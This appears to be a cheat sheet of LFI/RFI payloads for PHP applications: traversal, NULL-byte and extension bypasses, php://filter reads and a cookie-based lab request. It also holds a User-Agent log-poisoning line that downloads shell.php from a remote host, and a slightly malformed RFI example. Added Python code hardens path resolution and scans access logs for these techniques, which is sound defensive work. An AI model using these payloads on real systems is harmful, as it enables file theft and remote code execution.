
Local File Inclusion & Remote File Inclusion

Tags: LFI, RFI, Web, PHP, Filter Bypass

Payload Box - LFI/RFI Payloads

LFI: Local File Inclusion

Local file inclusion is a vulnerability that allows an attacker to traverse the file system because a request parameter is passed to a file-loading function without proper sanitization. This may allow an attacker to read sensitive files such as /etc/passwd.

The common attack vector for LFI is directory traversal with repeated ../ sequences:

get.php?file=../../../../etc/passwd

Each ../ steps up one directory level, so the sequence walks from the include directory up to the root and then down into the target folder. The number of ../ sequences needed depends on how deep the vulnerable script sits on the specific system.

Triggering Errors to Discover Path

index.php?lang=jfbdsgd

index.php?page=2/../../../../../etc/passwd

Supplying a nonsense value or a malformed traversal may return an error revealing the script's full path (and therefore the number of directories needed), or which function call is used (e.g., PHP's include()).

OS Detection:

/get.php?file=../../../../boot.ini

/get.php?file=../../../../windows/win.ini

Sanitization and Filter Evasion

NULL Byte Injection

In PHP 5.3.3 and below, a NULL byte (%00) terminates the string in the underlying C call, so anything the application appends after it (such as a .php extension) is ignored and the extension filter is bypassed:

index.php?lang=../../../../etc/passwd%00

Empty Extension

For sites that auto-append .php, leaving the extension parameter blank can evade the filtering:

&ext=

Stay in Directory

A trailing '.' refers to the current directory, so the path still resolves to the same file while looking different to a naive filter:

../../../../etc/passwd/.

Forced Directory Bypass

If the developer forces a directory prefix, evasion may be as simple as adding one more level of navigation:

/../../../etc/passwd  -->  /../../../../etc/passwd
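The bypasses in this section all target filters that pattern-match the string (looking for ../, checking an appended extension, prepending a directory). The following is an added example, not code from the original notes: a hardened resolver that decodes the value once, rejects NULL bytes, appends the fixed extension itself, resolves the result with realpath and then requires it to lie under the web root. BASE_DIR, FORCED_EXT and the sample values are constructed for the illustration; the base directory does not need to exist.

```python
import os
from urllib.parse import unquote

# Constructed web root for the example; it need not exist, because
# os.path.realpath resolves '..' and '.' lexically for missing paths.
BASE_DIR = "/srv/app/www"
FORCED_EXT = ".php"


class PathRejected(ValueError):
    """Raised when a user-supplied path would leave BASE_DIR."""


def resolve_under_base(user_path, base_dir=BASE_DIR, ext=FORCED_EXT):
    """Return the absolute path user_path denotes inside base_dir, or raise.

    Each step answers one of the bypasses in the notes:
    - decode once, so %2e%2e and %00 are examined as the characters they become;
    - reject embedded NULL bytes outright (the %00 truncation trick);
    - strip leading slashes, so an absolute value cannot replace base_dir when
      joined; extra '../' levels are then collapsed by realpath below;
    - append the fixed extension after the checks, so an empty '&ext=' cannot drop it;
    - realpath collapses '..', a trailing '.' and symlinks to the real target;
    - commonpath requires the real target to lie under base_dir, which also
      avoids the '/srv/app/www' vs '/srv/app/www2' string-prefix mistake.
    """
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise PathRejected("NULL byte in path")
    relative = decoded.lstrip("/\\")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, relative + ext))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathRejected("path escapes base directory: %r" % decoded)
    return candidate


def is_allowed(user_path):
    """True if the value would be served, False if the resolver rejects it."""
    try:
        resolve_under_base(user_path)
        return True
    except PathRejected:
        return False


# Parameter values from the notes (plain strings; nothing is read from disk).
SAMPLES = [
    "pages/about",                               # legitimate request
    "../../../../etc/passwd",                    # plain traversal
    "../../../../etc/passwd%00",                 # NULL byte against the extension filter
    "../../../../etc/passwd/.",                  # trailing '.'
    "/../../../../etc/passwd",                   # extra navigation past a forced directory
    "%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",    # URL-encoded dots
]


def evaluate(samples=SAMPLES):
    """Map each sample value to whether the hardened resolver accepts it."""
    return {s: is_allowed(s) for s in samples}


if __name__ == "__main__":
    for value, ok in evaluate().items():
        print("%-45s %s" % (value, "allowed" if ok else "rejected"))
```

Only the legitimate value is accepted; every traversal variant collapses to a real path outside BASE_DIR and is rejected by the commonpath check rather than by any substring filter. An allowlist of page names is stricter still and is the better choice when the set of includable files is known in advance.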

LFI - PHP Filters

/?view=php://filter/read=convert.base64-encode/resource=<path_object>/../../../../../../etc/passwd&ext=

The <path_object> may be whatever the ?view= parameter normally contains (e.g., "bikes" for a blog).

Apache Log Poisoning

Apache log poisoning can be exploited through the User-Agent header: the header value is written verbatim to the access log, so if the log file can be included via the LFI, PHP code placed in the User-Agent is executed and can download further malicious code:

User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://ip/shell.php'))?>

Using Burp Suite for Cookie-Based LFI

If $_REQUEST is used to read the parameter, the value can also be supplied through a cookie:

POST /challenges////////////chall3.php HTTP/1.1
Host: 10.10.120.210
Cookie: =../../../etc/flag3
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

file=../../../etc/flag3%00

RFI: Remote File Inclusion

Requires allow_url_fopen to be enabled.

Overview: payload hosted on the attacker's server -> payload URL injected via an HTTP request into the include() call -> payload executed on the server

GET /page.php?file=
lang=http://0.0.0.0/r.elf
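From the defender's side, the php://filter, log-poisoning and RFI techniques above all leave distinctive traces in the web server's access log. The following is an added example, not code from the original notes: a small scanner for Apache combined-format log lines that decodes the request target twice (so double-encoded traversal is not missed) and flags traversal sequences, NULL bytes, php:// wrappers, remote URLs in parameters and PHP tags in the User-Agent. The rule set, the log format assumption and the sample lines (TEST-NET addresses) are constructed for the illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format (assumed layout):
#   host ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (finding name, pattern, log field); patterns run on the decoded field value.
RULES = [
    ("traversal",      re.compile(r"\.\.[/\\]"),                            "target"),
    ("null_byte",      re.compile(r"\x00"),                                 "target"),
    ("php_wrapper",    re.compile(r"php://", re.I),                         "target"),
    ("remote_include", re.compile(r"[?&][^=&]*=(?:https?|ftp)://", re.I),   "target"),
    ("log_poisoning",  re.compile(r"<\?(?:php|=)", re.I),                   "ua"),
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode(value):
    """Percent-decode twice so double-encoded sequences such as %252e are caught."""
    return unquote(unquote(value))


def classify(line):
    """Return the sorted finding names for one line ('unparsed' if malformed)."""
    rec = parse_line(line)
    if rec is None:
        return ["unparsed"]
    return sorted(name for name, pattern, field in RULES
                  if pattern.search(decode(rec[field])))


def scan(lines):
    """Return (ip, target, findings) for every line with at least one finding."""
    results = []
    for line in lines:
        findings = classify(line)
        if findings:
            rec = parse_line(line) or {"ip": "?", "target": line}
            results.append((rec["ip"], rec["target"], findings))
    return results


# Constructed sample log: one clean request followed by the techniques in the notes.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?lang=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /get.php?file=../../../../etc/passwd HTTP/1.1" 200 1876 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?lang=../../../../etc/passwd%00 HTTP/1.1" 200 1876 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:49 +0000] "GET /?view=php://filter/read=convert.base64-encode/resource=bikes/../../../../etc/passwd&ext= HTTP/1.1" 200 2504 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /page.php?lang=http://198.51.100.7/r.txt HTTP/1.1" 500 0 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php echo \'poisoned\'; ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:56:15 +0000] "GET /get.php?file=%252e%252e%252fwindows/win.ini HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings), target)
```

The status code is parsed but deliberately not used as a filter: the 404 on the last line is still reported, because a failed traversal attempt is the earliest signal that someone is probing the parameter. On the server side, including a URL through include() is gated by php.ini's allow_url_include (Off by default since PHP 5.2) on top of allow_url_fopen, so a log line like the RFI sample above is only dangerous where that setting has been enabled.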

Tools

  • lfimap
  • lfitester
  • vailyn